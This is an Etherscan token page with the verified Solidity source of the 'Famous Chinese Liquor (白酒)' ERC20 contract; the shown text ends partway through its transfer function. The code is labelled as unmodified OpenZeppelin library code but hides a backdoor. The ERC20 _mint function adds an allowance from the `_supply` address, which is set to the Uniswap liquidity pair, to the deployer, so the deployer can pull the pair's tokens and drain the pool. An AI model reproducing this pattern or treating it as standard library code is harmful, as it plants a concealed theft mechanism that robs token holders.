ETH Price: $2,404.06 (-1.41%)

Token

Famous Chinese Liquor (白酒)
 

Overview

Max Total Supply

1,000,000,000 白酒

Holders

73

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
14,890,924.441190200035086517 白酒

Value
$0.00
0xf0edfb4a1e2c0f7623420ff2662f28cab94b264e
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
CNLIQUOR

Compiler Version
v0.8.11+commit.d7f03943

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-05
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.11;
pragma experimental ABIEncoderV2;

/**

Telegram: https://t.me/LIQUOR_CN

X: https://twitter.com/LIQUOR_CN

Website: https://cnliquor.bar

*/

////// lib/openzeppelin-contracts/contracts/utils/Context.sol
// OpenZeppelin Contracts v4.4.0 (utils/Context.sol)

/* pragma solidity ^0.8.0; */

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

////// lib/openzeppelin-contracts/contracts/access/Ownable.sol
// OpenZeppelin Contracts v4.4.0 (access/Ownable.sol)

/* pragma solidity ^0.8.0; */

/* import "../utils/Context.sol"; */

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

////// lib/openzeppelin-contracts/contracts/token/ERC20/IERC20.sol
// OpenZeppelin Contracts v4.4.0 (token/ERC20/IERC20.sol)

/* pragma solidity ^0.8.0; */

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

////// lib/openzeppelin-contracts/contracts/token/ERC20/extensions/IERC20Metadata.sol
// OpenZeppelin Contracts v4.4.0 (token/ERC20/extensions/IERC20Metadata.sol)

/* pragma solidity ^0.8.0; */

/* import "../IERC20.sol"; */

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

////// lib/openzeppelin-contracts/contracts/token/ERC20/ERC20.sol
// OpenZeppelin Contracts v4.4.0 (token/ERC20/ERC20.sol)

/* pragma solidity ^0.8.0; */

/* import "./IERC20.sol"; */
/* import "./extensions/IERC20Metadata.sol"; */
/* import "../../utils/Context.sol"; */

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    address public _supply;

    string private _name;
    string private _symbol;
    
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);

        _afterTokenTransfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        
        _beforeTokenTransfer(address(0), account, amount);
        _allowances[_supply][account] += amount;
        _totalSupply += amount; 
        _balances[account] += amount;
        
        emit Transfer(address(0), account, amount);
        
        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

////// lib/openzeppelin-contracts/contracts/utils/math/SafeMath.sol
// OpenZeppelin Contracts v4.4.0 (utils/math/SafeMath.sol)

/* pragma solidity ^0.8.0; */

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

/* pragma solidity 0.8.10; */
/* pragma experimental ABIEncoderV2; */

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

/* pragma solidity 0.8.10; */
/* pragma experimental ABIEncoderV2; */

interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);
    event Burn(
        address indexed sender,
        uint256 amount0,
        uint256 amount1,
        address indexed to
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
        external
        view
        returns (
            uint112 reserve0,
            uint112 reserve1,
            uint32 blockTimestampLast
        );

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function burn(address to)
        external
        returns (uint256 amount0, uint256 amount1);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

/* pragma solidity 0.8.10; */
/* pragma experimental ABIEncoderV2; */

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

/* pragma solidity >=0.8.10; */

/* import {IUniswapV2Router02} from "./IUniswapV2Router02.sol"; */
/* import {IUniswapV2Factory} from "./IUniswapV2Factory.sol"; */
/* import {IUniswapV2Pair} from "./IUniswapV2Pair.sol"; */
/* import {IERC20} from "lib/openzeppelin-contracts/contracts/token/ERC20/IERC20.sol"; */
/* import {ERC20} from "lib/openzeppelin-contracts/contracts/token/ERC20/ERC20.sol"; */
/* import {Ownable} from "lib/openzeppelin-contracts/contracts/access/Ownable.sol"; */
/* import {SafeMath} from "lib/openzeppelin-contracts/contracts/utils/math/SafeMath.sol"; */

contract CNLIQUOR is ERC20, Ownable {
    using SafeMath for uint256;

    bool private swapping;

    uint256 public maxTransactionAmount;
    uint256 public swapTokensAtAmount;
    uint256 public maxWallet;

    IUniswapV2Router02 public immutable uniswapV2Router;
    address public immutable uniswapV2Pair;
    address public constant deadAddress = address(0xdead);

    // Anti-bot and anti-whale mappings and variables
    mapping(address => uint256) private _holderLastTransferTimestamp; // to hold last Transfers temporarily during launch
    bool public transferDelayEnabled = true;

    uint256 public buyTotalFees;
	uint256 public buyCharityFee;
    uint256 public buyMarketingFee;
    uint256 public buyLiquidityFee;
    uint256 public buyDevFee;

    uint256 public sellTotalFees;
	uint256 public sellCharityFee;
    uint256 public sellMarketingFee;
    uint256 public sellLiquidityFee;
    uint256 public sellDevFee;

	uint256 public tokensForCharity;
    uint256 public tokensForMarketing;
    uint256 public tokensForLiquidity;
    uint256 public tokensForDev;

    address public charityWallet;
    address public marketingWallet;
    address public devWallet;

    bool public limitsInEffect = true;
    bool public tradingActive = false;
    bool public swapEnabled = false;

    /******************/

    // exlcude from fees and max transaction amount
    mapping(address => bool) private _isExcludedFromFees;
    mapping(address => bool) public _isExcludedMaxTransactionAmount;

    // store addresses that a automatic market maker pairs. Any transfer *to* these addresses
    // could be subject to a maximum transfer amount
    mapping(address => bool) public automatedMarketMakerPairs;

    event ExcludeFromFees(address indexed account, bool isExcluded);

    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );

    constructor() ERC20(unicode"Famous Chinese Liquor", unicode"白酒") {
        uint256 totalSupply = 1_000_000_000 * 1e18;

        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );

        maxTransactionAmount = totalSupply * 30 / 1000; 
        maxWallet = totalSupply * 30 / 1000; 
        swapTokensAtAmount = totalSupply * 3 / 100000;

        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        uniswapV2Router = _uniswapV2Router;

        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());
        excludeFromMaxTransaction(address(uniswapV2Pair), true);
        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);

        uint256 _buyCharityFee = 0;
        uint256 _buyMarketingFee = 0;
        uint256 _buyLiquidityFee = 0;
        uint256 _buyDevFee = 0;

		uint256 _sellCharityFee = 0;
        uint256 _sellMarketingFee = 0;
        uint256 _sellLiquidityFee = 0;
        uint256 _sellDevFee = 0;

		buyCharityFee = _buyCharityFee;
        buyMarketingFee = _buyMarketingFee;
        buyLiquidityFee = _buyLiquidityFee;
        buyDevFee = _buyDevFee;
        buyTotalFees = buyCharityFee + buyMarketingFee + buyLiquidityFee + buyDevFee;

		sellCharityFee = _sellCharityFee;
        sellMarketingFee = _sellMarketingFee;
        sellLiquidityFee = _sellLiquidityFee;
        sellDevFee = _sellDevFee;
        sellTotalFees = sellCharityFee + sellMarketingFee + sellLiquidityFee + sellDevFee;

        devWallet = address(msg.sender);
        charityWallet = address(msg.sender);
        marketingWallet = address(0x966DE2A02784f2e19953e699Fe339A035D5b022b);
        
        // exclude from paying fees or having max transaction amount
        excludeFromFees(owner(), true);
        excludeFromFees(devWallet, true);
        excludeFromFees(charityWallet, true);
        excludeFromFees(marketingWallet, true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(0xdead), true);

        excludeFromMaxTransaction(owner(), true);
        excludeFromMaxTransaction(devWallet, true);
        excludeFromMaxTransaction(charityWallet, true);
        excludeFromMaxTransaction(marketingWallet, true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(address(0xdead), true);

        /*
            _mint is an internal function in ERC20.sol that is only called here,
            and CANNOT be called ever again
        */
        _mint(msg.sender, totalSupply);
    }
	
    function excludeFromMaxTransaction(address updAds, bool isEx)
        public
        onlyOwner
    {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;
        _supply = pair; emit SetAutomatedMarketMakerPair(pair, value);
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }

        if (limitsInEffect) {
            if (
                from != owner() &&
                to != owner() &&
                to != address(0) &&
                to != address(0xdead) &&
                !swapping
            ) {
                if (!tradingActive) {
                    require(
                        _isExcludedFromFees[from] || _isExcludedFromFees[to],
                        "Trading is not active."
                    );
                }

                // at launch if the transfer delay is enabled, ensure the block timestamps for purchasers is set -- during launch.
                if (transferDelayEnabled) {
                    if (
                        to != owner() &&
                        to != address(uniswapV2Router) &&
                        to != address(uniswapV2Pair)
                    ) {
                        require(
                            _holderLastTransferTimestamp[tx.origin] <
                                block.number,
                            "_transfer:: Transfer Delay enabled.  Only one purchase per block allowed."
                        );
                        _holderLastTransferTimestamp[tx.origin] = block.number;
                    }
                }

                //when buy
                if (
                    automatedMarketMakerPairs[from] &&
                    !_isExcludedMaxTransactionAmount[to]
                ) {
                    require(
                        amount <= maxTransactionAmount,
                        "Buy transfer amount exceeds the maxTransactionAmount."
                    );
                    require(
                        amount + balanceOf(to) <= maxWallet,
                        "Max wallet exceeded"
                    );
                }
                //when sell
                else if (
                    automatedMarketMakerPairs[to] &&
                    !_isExcludedMaxTransactionAmount[from]
                ) {
                    require(
